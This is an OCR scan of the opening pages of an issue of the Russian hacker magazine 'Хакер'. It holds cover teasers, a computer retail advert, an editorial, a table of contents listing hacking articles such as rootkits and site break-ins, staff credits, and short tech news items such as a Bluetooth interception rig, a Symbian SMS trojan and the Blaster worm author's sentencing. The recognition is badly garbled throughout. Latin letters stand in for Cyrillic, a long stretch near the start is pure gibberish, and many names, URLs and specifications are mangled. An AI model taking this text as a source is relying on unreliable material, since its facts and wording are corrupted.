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Ш Скажи логам нет! стр. 80 
■ За стеклом стр. 90 



■ Специализация - эмуляция стр. 108 

■ Говорит и показывает Раіт стр.122 

■ Железный скрипт стр. 130 



Приватный канап 

Вся инфа о ПРИ Стр. 68 / 



Иапенький 
гигант большого 
интерфейса 

Грамотная подмена 
системных бинарников 



Тор Зесигііу 



Хроники ЦэЦэ 



Репортаж с 
крупнейшей 
деиопати России 



Криеорукин отечественный 
адиинаи посвящается 









Новый предел скорости! 

навое рекордное врвми атшнпка І_С РІ_АТКОМ 




При 12 мс не остается следов 

Менторы І_Е Рі_АТРЮ№оііервп«аіет преътедгаа^епеі* 
оо ипо^нй-и отн/<нкэ і2 мс 
еед* ѵЛ'ііѵгиз, монторм оноеосгэапрот І6-2Б мс. 
Тѳгчірьда*кесаууа дннэміі^иысі кадру остмчся чеічн«и 
іі ііе млввпяіатслЕлюв на знрэие 





,»ѵ‘ ■] • 4 ІИ ЦІ н Оч _■» 

і№| № ™ 5г ІѵДЙіТО ид*** !№і -ЬЬ № 'і-ип №■(:?№.' 



>ІН| -и ІЦІ »<іиі г^м..т*- -ім: /н ь*Лз .чиі 

іЛІЧ-^эттг^Пг ЛЙ!- ГП. ЕЛЕ 

.с-ѵ.і т^'и- №іѵіЖі*№ іі№а 
іД-^НИ клмшв мчйсііы'.ііт ш 5 



Иля в в * 1> -Ѵ,^- іШ\ШИѢ !іркчѵі&іі]Й:«ЛМШ *Рі&Й$ Гій 7» Фѵш- іВПІ 1» иЛ ІНЫ !■»■№• ГЛ Т&44 ШЮОЬ 

:« ши ѴІН.Й1 I» Я».« ГГІ 1ГГ* ЙНИМ и»1 ІЙПч в' НТ ЛЛі- * Ік ТЛ- -- ' " .чгв^іВД-ВД Г ^ 

Ѵі«ѵт Г в" г Г/.І Ь Ѵп «!*■ КИП Д^тал № № 41 X 3 ЖГ Ж .И 4 М Ц*иі№- ль »Иь 

да- ?і? зги р.-шні ьу- •№ гітшіі н, ірѵ»і ірві вЧ^Ь-і' Г'Ь гш іэп. ^І4іл ім.' га, 14 км іа ши- 

-іярі Ыяі^іЯВі 1&Б клв ВТК В ГН- №4 Гіыэмюлі ьѵчіі>:іг •№; -Н2: 1 1/8 П^л Ічгр^ №- ‘іР-РТ-И 

1 іЛН ,-П /ЪЫ 77В ЕЧЛ Іртвів Дчм*риж ;ДК. Л ■ КВ Ир ц-л УУ ■ Г7 ІЕЫ Сяв Пгчрй^г < ■■ ѵц |І ь ?і ІШ 4ЖШ !ІИГ №и И ■/, 

ШиНШС 71 .. ■ ЬгиэрД ІМІ- к.:'Л7|И И Іі! 1нс ПиФк . ЛШ, 2 - I/ 37 Нлщжт- ЙЩ-Ю Ш2 „Л- Гг "ЯГ СГ.ВДІ' ■ Іи^ ’ні ^ 14/ --‘И/ 

гйдйя .-ЗГЕ- '7 л II «ЙН гта ІІ 3+ ір №ч та яда да, ржі ШЩ ПШ Ч И ІІ Іі г дай » » Р № ■ і Ич мд?. инл нцр ПЧ№І ш 

> 11 ' п 1 -н град»-: л и. 71 4ж л™,иаДК *7 Р**т Прч ■*— И-Ч-7* Рн Гдсш* гНЯІР Рлѵ № ■И-і?і « 1 1 ы. *№ 

МІ]: 4ч * № П І І ІНІ кмдаіПІІ-ИД. Ь* РМН №№#ЧМ1 иу : ■> % н МНИ ИІ Ч *— ^ дат ДЦТ? Т1 Г*||1Ч 

»Ы: Н НПО» **!№ «№ М4ІЭ НИтшт ип— г іІѴіА ЛМК: №чрі к-н.* і ѴН> 2 і «■№ Рин РКШ 1№ТГ 

*Ш№ іЕ№ ГТ-» 1 » № КЩ&кЗ «У ІГ VI ^ ШтЙ И Р • ■■ 11 М. Ги-Кі^сЯВД М =мгі іМІ »і> "й Ънцрг НС ІІмП№/Л !' № 

№ і*-ч- -ІЛ». Ч М В. Чпрр»Ац :ч-м Р^іШіІаікШн ШІ№1І.И Ъч^гі тИ# №№ Н-И Д.Сиии Чч-ІЕГ ІІМІ Н««1. 
(ШЧ р.-ь-Чц— Рек- в-Цііі ГМІ*Р 'Ч/ ^ЙЙ Чаіігь - Г4-І Шн^іМУ. I-' ■■ 1 ІШ і'-- К -Д і;-. ^ ТіШ-і я*- И№4 ■' > 

і - . Чи Ші Ч.** І'-.К ііі-ѵі ІЛ»* Мл ^ -.ѵ- І.ІІЙМЙ "пил !Р,Ѵ Ц-ЬХ ><**ЫЬ .ѵ:Н -.: -і Н Л Ой-.-^ ■ - — і-ИГЛЕ-іЬ 4 •• - р- 

ЗИГ|Й^,2*^-« Чхиірргч -*Р.л ЙИ:1Ѵ. !■ і= -С та* - - V. I : Н- 






:пііі .и ІЬгЬта іГМ ГП ГІПІ ■ Мр %пк|г > 



■ неін Іи Г>Л в г [п' Па ЧіДИгр -р 



ы-- іиі; гаг гиі 

ІГ, ІП 4Й.І 



к > 2М„ К 1Л4 





МНОГОКАНАЛЬНЫЙ 



роі^віз 

СЕТЬ КОМПЬЮТЕРНЫХ ЦЕНТРОВ 



(М7-55555-7 

ТЕЛЕФОН КЛИЕНТСКОЙ СЛУЖБЫ 




Процессор Іпіеі® Репііит® 4 с технологией НТ расширит 
возможности ваших домашних развлечений. 

• Смотрите ваше любимое телешоу уже сегодня. 

• Создавайте домашнее кино и записывайте к нему музыку. 

• Редактируйте цифровые фотографии, а затем покажите их 
друзьям на компьютере, телевизоре или на ѵѵеЬ-сайте. 



Компьютер А^еІМТ на базе процессора ІпІеІ®РепІіит®4 
с технологией НТ позволит Вам наслаждаться кино, музыкой и 
фотографиями вместе с друзьями. 



• 3-х летнее бесплатное обслуживание, включая год полной гарантии 

• бесплатное обслуживание на рабочем месте в Москве (в пределах МКАД) 

• 100% предпродажное тестирование 

• отличные характеристики для работы дома и в офисе 

Компьютер можно заказать с доставкой по телефону: 

(095) 970-1939 или на интернет-сайте зНор.пІ.ги 



ѵѵѵѵѵѵ.роіагіз.ги | іпТо@ро!агіз.ги 



СО 



ОБЪЕДИНЕННАЯ РОЗНИЧНАЯ СЕТЬ РОБАРІЗ 



Москва, м. Сокол, Волоколамское шоссе, 2 (095) 151-5503 

Москва, м. Шаболовская, ул. Шаболовка, 20 (095) 237-8240 

Москва, м. Красносельская, ул. Краснопрудная, 22/24 (095) 262-8039 

■. Москва, м. Комсомольская, ун-г «Московский», 4 эт., пав. 27 (095) 916-5627 

Москва, м. Профсоюзная, Нахимовский пр-т, 40 (095) 129-1119 

Москва, м. Площадь Ильича, ул. С. Радонежского, 29/31 (095) 278-5470 

Москва, м. Савеловская, ВКЦ «Савеловский», пав.: 024 (095) 784-6385 

Москва, м. Щукинская, ул. Новощукинская, 7 (095) 935-8727 

Москва, м. Пражская, ТЦ «Электронный рай», пав.: 1Б-47 (095) 389-4622 

Москва, м. Люблино, ТК «Москва», 2 этаж, 1 линия (095) 359-8915 

■. Москва, м. Савеловская, Сущевский вал, 3/5 (095) 973-1133 

Москва, м. Багратионовская, ТВК «Горбушкин Двор», пав.: Е2-14/15 (095) 730-1549 

Москва, ул. Малая Дмитровка, 1/7 НОВЫЙ (095) 200-3060 

■. Москва, м. Красносельская, ул. Русаковская, 2/1 (095) 264-1333 

■. Москва, м. Динамо, ул. 8 Марта, 10, стр. 1 (095) 363-9333 

■. Москва, м. Братиславская, ул. Братиславская, 16, стр. 1 (095) 347-9638 

■. Москва, м. Дмитровская, ул. Башиловская, 29/27 (095) 797-8064 



• г. Санкт-Петербург, м. Пр. Просвещения, ТК «Норд», пав 204 

• г. Санкт-Петербург, м. Академическая, ТК «Грэйт», пав. 28 

• г. Н. Новгород, ул. Пискунова, 30 

• г. Н.Новгород, м. Канавинская,ТЦ «Новая Эра», 1 этаж 

• г. Н.Новгород, ТЦ «Новая Эра», «Цифровая студия РОЬАРІЗ» 

• г. Ростов-на-Дону, пр-т Буденновский, 11/54 

• г. Ростов-на-Дону, пр-т Буденновский, 80 

• г. Ростов-на-Дону, пр-т Нагибина, 34Л, ТЦ «Поиск» 

• г. Ростов-на-Дону, пр-т Ворошиловский, 12 

• г. Воронеж, ул. Кольцовская, 82 

• г. Воронеж, пр-т Революции, 44 



н с бесплатной доставкой по Москве зИор.пГ.ш 
• Отдел корпоративных решений: ул. 8 Марта, д. 10, стр. 1 



(812) 331-6244 
(812) 590-8480 
(8312) 78-0861 
(8312) 16-9787 
(8312) 16-9788 
(8632) 62-3978 
(8632) 92-4242 
(8632) 72-5472 
(8632) 40-5353 
(0732) 72-7391 
(0732) 20-5055 

(095) 970-1939 
(095) 363-9333 




рРПІШГП 4 



Логотипы ІМТ Сотриіег и Р0БАРІ5 являются зарегистрированными знаками их владельцев. Іпіеі, Іпіеі Іпзісіе І_о|о, Репііит являются зарегистрированными торговыми знаками корпорации Іпіеі и ее дочерних компаний в США и других странах. 



ТОВАР СЕРТИФИЦИРОВАН 






Вышел на киноэкраны фильм "Пос- 
лезавтра". Все ринулись смотреть. 
Много шума наделала кинолента. А 
ведь не вымысел там, по большей- 
то части. Все эти резкие перемены 
климата, глобальные потепления и 
похолодания - все это уже сейчас 
начинает проявляться. Все лето я 
сидел без интернета, потому что 
ежедневно после грозы выгорали 
хабы, свичи и роутеры. Ну ведь не 
было раньше такого, чтобы ежед- 
невно гроза :(. Да и взять, к приме- 
ру, Сибирь: летом до 40 градусов 
выше нулевой отметки - диву дать- 
ся! А в Москве торчим все бледные 
от недостатка ультрафиолета. 

Или вот еще пример: отшумевший 
совсем недавно фильм "Я, робот" с 
Уиллом Смитом в главной роли. Ка- 
жется, что гонево все это. Совсем не- 
далекое будущее показывают, а там 
уже какие-то консервные банки ви- 
дят сны, потому что искусственный 
интеллект люди для них разработали 
такой, что от обычного человеческо- 
го разума и не отличишь сразу. 
Годом раньше, годом позже, но мы 
придем к этому. Человечество и 
технический прогресс идут семи- 
мильными шагами по тропе разви- 
тия. Совсем недавно наши отцы си- 
дели на ЕС'ках, а прошло полтора 
десятка лет, и мы юзаем уже трех- 
гигагерцовые пни. Электронные со- 
бачки Айбо уже могут сами выраба- 
тывать фекалии из подручных 
средств, чем приводят в неописуе- 
мый восторг детишек своих хозяев. 
А роботы, помогающие людям уже 
практически во всем, хоть и не от- 
личаются пока что особым интел- 
лектом, но становятся день ото дня 
все умнее и универсальнее. 

И вот смотрю я на это все и жалею, 
что родился так рано. Хотя бы на век 
позже родиться. Хотя бы одним гла- 
зиком взглянуть, что там будет че- 
рез сто лет! Мы родились так рано. 
Так много еще хочется увидеть, но, 
видимо, не судьба :(. 

А пока же мы делаем журнал "Хакер". 
И, как создатели такого прогрессив- 
ного журнала, стараемся не только 
донести самую свежую информацию 
до читателей, но и даже заглянуть на 
день вперед, рассказывая о том, о 
чем еще никто не рассказывал. Аты, 
дорогой читатель, надеюсь, именно 
за это нас и любишь. 

ЬООЫік 




N Т Е N Т 



ньюсы 



04 МегаНьюсы 



РЕШИ 



14/Бюджетные шіпіОІІ 
2 1 /Появился очередной игровой ионстр 



РС20ИЕ 



22 Пнтипич. Не дай себя обокрасть 
26/0118. Копаем глубоко 
30/88Н на лопатках 
34/3ащити свой инет-трафик 
30 ШеЬМаіІ. Дешево. Качественно. 
Гарантия 



88Н но полотках 




Выбираем $$Н-клиент для 
удаленной работы с сервером. 



Ш0Р0ШПКЕ2 



Шаро1ШЕ2 



иипппнт 



52/Бей лазером по банкам 




56/НасНПО 
60/Взпом по-японски 
63/Обзор эксплойтов 
64/Вооружись своим руткитом 
68/Приватный канал 
72/Второе рождение ірІаЫез 
7 6 і Деструктивные потоки 
80/Скажи погам нет! 

04/Как помапи Гпюкозу.ш 
06/Против пома нет приема! 
89/Конкурс взлома 



СЦЕНО 



90/История ОС В80 
94/За стеклом 

98/Свободное ПО ѵз открытое ПО 
1 02/Хроники ЦэЦэ 



История о том, как кривору- 
кость админов привела к 
взлому крупного сайта. 




ВООРУЖИСЬ 
СВОИМ РУТКИТОМ 



Прячем свои следы на 
сервере - устанавливаем 
правильный руткит. 




КПК ПОМППИ ГПЮК03У.ВІІ 






ПРОТИВ ПОМР НЕТ ПРИ ЕМР! 




Ломаем систему 
защиты НТМІлонтента. 



история развития взв 




Откуда берет свое начало 
В50-система. Появление 
операционных систем РгееВ$Р, 
№ІВ$0 и ОрепВЗО. 



ЦИІХОІО 



1 0 8/Специапизация - эмуляция 
1 1 2/Хардкорные разборки с консолью 
1 1 6/Депаем ГгееВбО безопасной 



копинг 



1 20і Маленький гигант большого 
интерфейса 

1 22/Говорит и показывает Раіш 
1 26/8цШе: легче не бывает! 

1 30/Жепезный скрипт 
1 34/Обзор компонентов 



КРЕПТИФФ 



136/Куни 



юниты 



144/ШШШ 

146/ГОО 

149/Конкурс читателей 
150/Диско 
153/Х-Сгеш 
1 54/ё-таіІ 
156/Хумор 

160/Треп с читателями 



НРРДКОРНЫЕ РПЗБОРКИ С КОНСОЛЬЮ 




ШОШИС!!! 



РЕДПКЦИЯ НППОМИНОЕТ, ЧТО ВСЯ информация, КОТОРУЮ МЫ ПРЕЦОСТОВПЯЕМ, 

рассчитана прежде всего на то, чтобы указать розничным компаниям 
и организациям на их ошибки в системой безонпсности. 



/РЕДАКЦИЯ 
>Главный редактор 

Иван «СиТТег» Петров 
(сиЯвг@ геаі .хакер, ги) 

>Выпускающий редактор 

Андрей «зутЬіозіз» Рыбушкин 
(зут Ьіозіз@ геаі .хакер . ги) 

>Редакторы рубрик 
ВЗЛОМ 

Никита «ІЧІкіІоз» Кислицин 
(пікі1ог@геаІ.хакер.ги) 

РС_20МЕ 

Артем «ЬООЫік» Аникин 
(ЬООМІк@геаІ.хакер.ш) 

СЦЕНА 

Олег «тіпсІѵѵОгк» Чебенеев 
(тіпсІѵѵОгк@геаІ.хакер.ги) 

ИИ ІХО ю 

Андрей «Апсігизііоск» Матвеев 
(апбги5боск@геа1.хакер.ги) 

КОДИНГ 

Александр «Ог.КІоипіг» Лозовский 
(аІехапсіег@геаІ.хакер.ги) 

тго/сэ 

Виталий «NN1» Волов 
(біпІ@геаІ.хакер.ги) 

ИМПЛАНТ 
Алекс Целых 
(ебі1ог@іесбпеѵі/з.ги) 

Литературный редактор 
Анна «татаКагІо» Апокина 
(арокіпа@геаІ.хакер.ги) 

/АПТ 

>Арт-директор 

Кирилл «КПОІ» Петров (кегеІ@геаІ.хакер.ги) 
Дизайн-студия «100%КПД», ѵѵт.ІООкрб.ги 

>Мега-дизайнер 

Константин Обухов 

>Гипер-верстальщик 

Алексей Алексеев 

/ІЫЕТ 

>ѴѴеЬВоз8 

Скворцова Алена 
(АІуопа@ геаі .хакер . ги) 

>Редакгор сайта 
Леонид Боголюбов 
(ха@ геаі .хакер . ги ) 



/РВ 

>РВ менеджер 

Агарунова Яна 
(уапа@датеІапсі.ги) 



/РЕКЛАМА 

>Директор по рекламе датеіапсі 

Игорь Пискунов 
( ідог@датеІапсІ . ги ) 

> Руководитель отдела рекламы 
цифровой группы 

Басова Ольга 
(оІда@датеІапсІ . ги) 

>Менеджеры отдела 
Крымова Виктория 
(ѵіка@датеІапб.ги) 

Емельянцева Ольга 
(оІдаетІ@датеІапсі.ги) 

Алексей Филия 
(рбіІіуа@датеІапсі.ги) 

> Трафик менеджер 
Марья Алексеева 
(аІекзееѵа@датеІапсі.ги) 

тел.: (095)935.70.34 
факс: (095) 924.96.94 

/РЦВЫ8НІЫС 

>Издатель 

Сергей Покровский 
(рокгоѵзку@датеІапсІ.ги) 

>Учредитель 

ООО «Гейм Лэнд» 

>Директор 
Дмитрий Агарунов 
(с!ті1гі@датеІапсІ.ги) 

>Финансовый директор 
Борис Скворцов 
( Ьогіз@датеІапсІ . ги ) 



/ОПТОВАЯ ПРОДАЖА 
>Директор отдела дистрибуции 
и маркетинга 
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КОТ-ПЫПЕСОС 



НІТЕСН 



К омпания ЗВох (Шр://]Ьох.суЬгНо$і.сот) 

выпустила минипылесос для чистки 
рабочего стола. Нет, прикольный анимеш- 
ный розовый котенок из сериала «НеІІо 
КіНу» вовсе не станет удалять ярлыки, 
файлы и папки с твоего рабочего стола на 
компьютере в треш. А вот если ты прове- 
дешь по своему столу, за которым работа- 
ешь, пальцем, то поймешь, что со слоем 
вековой пыли может справиться только 
кот-пылесос. Кот-пылесос, питающийся 
от двух батареек типа АА, лихо удалит всю 
пыль и грязь с поверхности стола. Он нас- 
только маленький и маневренный, что ему 
можно найти применение практически во 
всех местах квартиры и офиса. Един- 
ственный минус этого чуда - пылесос не 
снабжен различными дополнительными 
фигурными насадками, так что им не по- 
лучится нормально высосать пыль из уг- 
лов, а также не удастся навести уборку в 
системном блоке компьютера. Стоит это 
дите хайтековской мысли всего 10 амери- 
канских рублей, что делает его доступным 
широким массам. Заказать новинку мож- 
но на сайте производителя. ■ 




УМНОЕ СТЕКЛО 



НІТЕСН 



Б ританские ученые из Университетс- 
кого колледжа в Лондоне разработа- 
ли специальное умное стекло, которое 
способно защищать помещение от перег- 
рева. Обычное стекло покрывают тонким 
слоем диоксида ванадия с примесью 
вольфрама. При температуре до 29 гра- 
дусов по Цельсию такой слой пропускает 
как видимое, так и инфракрасное излуче- 
ние. Однако при повышении температу- 
ры диоксид ванадия меняет свои свой- 
ства и начинает отражать инфракрасное 
излучение, предотвращая тем самым пе- 
регрев комнаты. Такая технология явля- 
ется намного более разумной, нежели 
светоотражающие пленки, которые бло- 
кируют тепловую энергию постоянно. ■ 
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ОХОТНИКИ 
НО БП9Т9С 




Ж ители одного аме- 
риканского городка 
днем могут лицезреть 
картину: молодой пар- 
нишка, экипированный 
по самое не балуйся, с 
непонятного рода винтов- 
кой ходит по улицам и це- 
лится в пространство. 
Вместо дула у винтовки 
антенна. Аборигены раду- 
ются - надо же, охотники 
за привидениями верну- 
лись, избавят, наконец, 
городок от нечисти. Но 
рано радуются. 

На самом деле это мем- 
беры группы РІехіІіз, за 
плечами которых покоит- 
ся ноутбук, а винтовка 
представляет собой 
чувствительную 
ВІиейюКі-антенну. Эки- 
пировка позволяет обна- 
руживать блутус-устрой- 
ства и перехватывать с 
них инфу. Благодаря 
чувствительной антенне, 
работать можно на рас- 
стоянии около километра 
и перехватывать инфу да- 
же с железа, находящего- 
ся внутри помещения. 
РІехіІіз сгеѵѵ уже давно ув- 
лекается беспроводными 
устройствами. Их первая 
разработка называлась 
Ѵаді РШІе, была сделана 
из винтовки М16 и апг- 
рейженного блутус-донг- 
ла, к которому припаяна 
чувствительная антенна. 
С помощью такой штуки 
один из парней перекинул 
контакты телефонной 
книжки с мобильника, на- 
ходящегося на расстоя- 
нии 1,7 км. Пока ребя- 
тишки развлекаются, но 
вполне возможно, что их 
способностями могут за- 
интересоваться и вос- 
пользоваться. Например, 
представители арабских 
стран, где ведется борьба 
с блутус-девайсами. ■ 



РРРІЕ 01КР0КТ ПОИМЕЛИ 




В сети появилась новая утилита 
20-летнего норвежского хаке- 
ра Йона Йохансена, автора проги 
йеСЗЗ для взлома защиты от копи- 
рования ОѴО-дисков. Называется 
она ОизІеРоП и позволяет обходить 
защиту беспроводного музыкально- 
го сервиса АігроП Ехргезз компании 
Арріе. Для того чтобы скачать му- 
зычку по вай-фай, по-хорошему 
нужно купить у Арріе пакет іТипез, 
обменивающийся с серваком за- 
шифрованным трафиком. Но благо- 
даря Йону, опубликовавшему коды 
АігРоіІ Ехргезз и открытый ключ, 



применяемый при шифровании 
трафа, создать альтернативное ПО 
теперь вопрос времени. 

Все свое добро хакер выкладывает 
на сайте под названием «5о зие те» 
(«Ну давайте, засудите меня, пья- 
ные мартышки, черви корпоратив- 
ные! Что, кишка тонка? То-то же. 
Имел я вас!» - перевод тіпсІѵѵОгк :). 
Адрес сайта: м.папосгеѵѵ.пеі/Ыод. 
Сдается мне, что играет Йохик с ог- 
нем. Пока Арріе молчит, но если 
ущерб компании окажется ощути- 
мым, вряд ли хакеру стоит рассчи- 
тывать на тихую жизнь. ■ 



мощная цифра 




атзипд ЕІесігопісз после некото- 
рой паузы взяла да и обновила 
линейку V своих цифровых фотокамер. 
На этот раз менеджеры компании пре- 
зентовали камеру Затзипд Оідітах 
Ѵ6, оборудованную 6-мегапикселным 
сенсором высокого качества и претен- 
дующую на сегмент полупрофессио- 
нальных устройств. Уже по надписям 
на коробке понятно: этот монстр рас- 
считан по набору имеющихся функций 
на фотографов, претендующих на по- 
лучение снимков профессионального 
качества. Чтобы не занимать много 
места при описании всех примочек 
этой камеры, просто приведу краткие 
спецификации новинки: 
а Сенсорная матрица: 1/1,9 дюйма, ПЗС; 
абсолютное разрешение - 6,4 млн. пикселов, 
эффективных пикселов - 6,1 млн. 
л Возможные размеры снимков: 2816x2112, 
2560x1920 , 2272x1704, 2048x1536, 1600x1200, 
1024x768, 640x480 

^ Запись видеоклипов: 640х480@301рз 
л Формат снимков: ТІРР, Ж6 (0СР), ЕХІР 2.2, РР0Р 



1.1, РісІВгібде 1.0 - для статических, АѴІ (Моііоп 
Ж6) - для клипов 

а Объектив: Зсііпеісіег Кгеихпасіі; оптическое 
увеличение - Зх, фокусное расстояние - 38-114 мм 
в 35-мм эквиваленте 
а Фокусировка: автоматическая, ТИ 
а Дистанция фокусировки: 0,8 м - бесконечность 
в обычном режиме, 0,3-0, 8 м в режиме 
макросъемки, 0,06-0,3 м (И!) - в режиме зирег 
піасго 

а Светочувствительность: 150 50/100/200/40 
А Диапазон выдержек: 2-1/2000 с 
а Режимы экспонирования: программный 
автоматический, автоматический с приоритетом 
затвора, автоматический с приоритетом 
апертуры, ручной 

А ЖК-экран: 1,5 дюйма, ТРТ 1С0, 115 тыс. пикселов 
А Интерфейсы: У5В 1.1, АѴ-выход 
а Карта памяти: 50/ММС 
а Источник питания: 2 аккумулятора АА любого 
типа, СК-ѴЗ, аккумулятор 5І.В-1437 
а Размеры камеры: 106x55x38 мм 
а Масса: 170 граммов без аккумулятора 
Конечно, до профессиональных моде- 
лей этой малышке не дотянуться, од- 
нако учитывая цену ($450), это до- 
вольно привлекательное решение для 
любительской съемки. ■ 



БУКИ ОСЕЙ 




Р азвивая свое наступ- 
ление на европейс- 
кие рынки, компания Асег 
разработала две новые 
серии своих ноутбуков: 
ТгаѵеІМаіе 4000 и 4500. 
Обе линейки функциони- 
руют на базе технологии 
Іпіеі Сепігіпо и ориенти- 
рованы прежде всего на 
корпоративных пользова- 
телей. 

Все представленные но- 
утбуки работают на базе 
кристаллов Іпіеі Репііит 
М с тактовой частотой от 
1,5 ГГц, использующих 
400-мгц системную шину 
и оборудованных двумя 
мегабайтами кэш-памяти 
второго уровня. Новинки 
доступны покупателю в 
двух вариантах: с диспле- 
ем диагональю 15 дюй- 
мов (1024x768) и 15,4 
дюйма (1280x800). 
Благодаря использова- 
нию современного чипсе- 
та Іпіеі 855СМЕ, ноутбуки 
оборудованы рядом ин- 
тегрированных устройств: 
встроенной графической 
платой Іпіеі Ехігепле 
ОгарГіісз 2, ѴѴі-Рі-адапте- 
ром, 56К-модемом и 
ЮОВазе-Т сетевой кар- 
той. Также пользователю 
доступны 3 порта 115В 2.0 
и адаптер ІЕЕЕ 802. 11 Ь/д 
Іпіеі РКО/ѴѴігеІезз 
2200ВС. Весит это чудо 
чуть меньше 3 кг, при 
этом от стандартной ба- 
тарейки проработает 5 
часов. ■ 





ЖЕЛЕЗО 



П инейку своих ІІЗВ-флешек 
ІІ5В2.0 ЗеІРІазЬ Міпі обнови- 
ла компания ТгапзсепсІ, выпустив 
1 Гб и 2 Гб модели, отличающие- 
ся уменьшенными размерами: 
75x22x10 мм при массе в 11 
граммов. Таким образом, по 
сравнению с предыдущими 
ЗеіРІазЬ размеры устройств сок- 
ращены на 40%. Скорость пере- 
дачи данных составляет 8 Мб/с 
при чтении и 7 Мб/с при записи. 
Уже традиционно новинки осна- 
щены специальным переключа- 
телем, защищающим от записи, 



ттт 



а при помощи идущего в комп- 
лекте софта можно обеспечить 
парольную защиту данных. Также 
новые флешки поддерживают 
функции загрузочного диска. Но- 
вый модельный ряд представлен 
целой кучей устройств, отличаю- 
щихся объемом и цветом. Мар- 
кировка в общем виде представ- 
лена так: Т5хххІѴиР2у, где ххх - 
объем устройства, а у - цвет. ■ 




СОЛНЕЧНОЙ ЗУБНОЙ ЩЕТКИ 





________ 






НІТЕСН 






Н а самом деле зубная щетка на солнечных батарейках Зоіаг 
Роѵѵегеб РЬоІо Саіаіузі Зоаріезз ТооІЬ ВгизГі, произведенная 
одной из многочисленных японских компаний, нуждается в солнеч- 
ном питании не для того, чтобы заряжать моторчики энергией. И 
вправду, логично было бы предположить, что щетку нужно подер- 
жать минут 20 под светом солнца или простого комнатного све- 
тильника, чтобы она зарядилась и ей можно было воспользовать- 
ся. В таком случае аппарат был бы крайне неудобен где-нибудь на 
природе, когда во время вечернего туалета им невозможно было 
бы воспользоваться. С Зоіаг Роѵѵегеб РЬоІо Саіаіузі Зоаріезз ТооІЬ 
ВгизГі все обстоит намного проще. Нормально почистить зубы 
удастся и безо всякого света. Солнечная энергия щетке нужна для 
ионизации воздуха, не более. В качестве ионизатора используется 
титан. Похожая технология используется в кондиционерах, комнат- 
ных ионизаторах и прочих системах очистки воздуха. Ученые также 
рассматривают титан как довольно перспективный материал для 
солнечных батарей. Стоимость такой ионно-щетки 45 долларов. 
Заказать ее можно на ѵшѵштрасіітрасі.сот. ■ 




Никакого мусора и невнятных тем, 
настоящий геймерский рай 

ТОЛЬКО РС ИГРЫ 



■ ОООМ III - одна из главных игр XXI 
века наконец-то вышла! Новый 
культ? Или всего лишь разогрев пе- 
ред выходом настоящей звезды, 
НаІМіІе 2? Узнай об этом первым! 

■ «РС ИГРЫ» расставили все точки 
над «і» - существует ли зависи- 
мость от игр, что случилось с попу- 
лярной игрой «Бойцовский клуб» и 
есть ли киберспорт в России! 

■ Новое в «Дневниках разработчи- 
ков» (рассказы о Корсарах II и 
З.Т.А1.К.Е.В.) и «Ретро» (история іб 
ЗоІІѵѵаге - от ОООМ до ОООМ III). 



9-й номер уже в продаже 



ЕСЛИ ТЫ ГЕЙМЕР - 
ТЫ НЕ ПРОПУСТИШЬ! 



Правильный объем 240 СТрЭНИЦ 



Правильная комплектация 

3 СР или РѴР 



Правильная цена 



по 

РУБЛЕЙ 








графика от эпьзы троян дня смяртфонов оказался 

трюком разработчиков 




О начале продаж графической платы 
еишс РСХ 736 256МВ сообщило 
японское представительство компании 
ЕІ_ЗА. Новинка поддерживает интерфейс РСІ 
Ехргезз х16 и оснащена, как ясно из марки- 
ровки, четвертью гигабайта графической 
памяти. Представленный адаптер построен 
на базе чипа ИѴЮІА СеГогсе РСХ 5750, так- 
товая частота графического ядра составляет 
425 МГц, а памяти - 500 МГц, используется 
128-битная шина памяти. СІАОІАС РСХ 736 
256МВ оснащена интерфейсами \М-\ и 0- 
5иЬ (аналоговый ѴОА-выход). Для Ш-\ под- 
держивается максимальное разрешение 
1600x1200, для Р-ВиЬ - 2048x1536. Вместе 
с камерой поставляются драйверы для ра- 
боты с йігесІХ 9.0, ОрепСИ 1 .4. Планирует- 
ся, что цена этого устройства составит око- 
ло 210 долларов. ■ 




К огда в Сети разлетелась новость о появлении трояна ОсІіаІ26 под 
ЗутЬіап 05, владельцы смартфонов взволновались. Неудивительно - 
попав в память, зверек отсылал смски на платный номер, зарегистрирован- 
ный где-то в Великобритании. Одна такая 5М5 стоит 3 бакса за штуку. Прав- 
да, подцепить заразу можно только если скачать пиратскую версию игры 
Мозциііо 2.0. Сначала все подумали, что автору трояна начисляется какой-то 
процент с прибыли. Но на самом деле все оказалось гораздо интереснее. 
Дело в том, что авторы Мозциііо нарочно вставили в свою игру код для от- 
сылки 5М5, чтобы приостановить распространение пиратской версии прог- 
раммы. На легальных юзеров беда не распространялась. После того как на- 
род узнал, в чем дело, «инфицированные» смартфонщики завалили авторов 
Мозциііо жалобами и угрозами, пришлось нехороший код убрать. Тем не ме- 
нее, в р2р сетях лежит множество все еще затрояненных копий. Так что ес- 
ли ты счастливый владелец Иокіа Зеіез 60, будь осторожен! ■ 



совсем настоящий 

ИГРУШЕЧНЫЙ ВЕРТ0ПЕТ 




8 еіко Ерзоп занимаются не только принтерами, скане- 
рами и часами. В середине августа компания удивила 
мир своим новым изобретением. Это миниатюрный верто- 
лет под названием цГВ-ІІ. Весит он всего 8,6 грамм, что на 
1 ,4 грамма меньше, чем весил его предшественник. Уп- 
равление вертолетом осуществляется по протоколу 
ВІиеІооШ, а не по проводу, как было в прошлой модели. 
Питание он получает от маленьких ионо-литиевых аккуму- 
ляторов. На борту вертолета находится 32-разрядный 
ВІЗС-процессор 51СЗЗ производства Зеіко Ерзоп, который 
и контролирует все системы вертолета. ■ 



овтор вигстЕН’п 

0ТПР0ВИТСЯ В ТЮРЬМУ 




В городе Сиэтл окончилось судебное 
разбирательство по делу автора 
компьютерного червя Віазіег, 19-летнего 
Джеффри Ли Парсона. Думаю, ты в курсе, 
сколько дел натворил этот червячок в 
прошлом году. После буйства Бластера 
седых волос на голове Билли Гейтса при- 
бавилось на порядок. А это, как ты пони- 
маешь, безнаказанным остаться не могло. 
Парсон признал свою вину, раскаялся и 
рассказал, как написал свое детище с ва- 
риациями ЫазІег.Ь и ЫазІегТеекісІз. Судья 
растрогался и, откашлявшись, объявил 
приговор: «Джеффри Ли Парсон, окруж- 
ной суд Сиэтла приговаривает тебя к 37 
месяцам тюремного заключения и штрафу 
в размере большого количества денег. 
Приговор окончателен и обжалованию не 
подлежит. Удачи тебе, сынок!». 

Так закончилась эпопея червя Бластер, ко- 
торый навеки вошел в анналы зесигйу-исто- 
рии. Парнишку жалко. 3 года в тюрьме про- 
зябать - это вам не Турция, Стамбул. ■ 



Б0ЙТЫ ЧЕРЕЗ КОЖУ 1111 III III 



ШШИІ - иіг “ Ч 


I емецкая компания 

1 Ісіепі Тесіппоіоду раз- 
работала способ передачи 
информации через челове- 
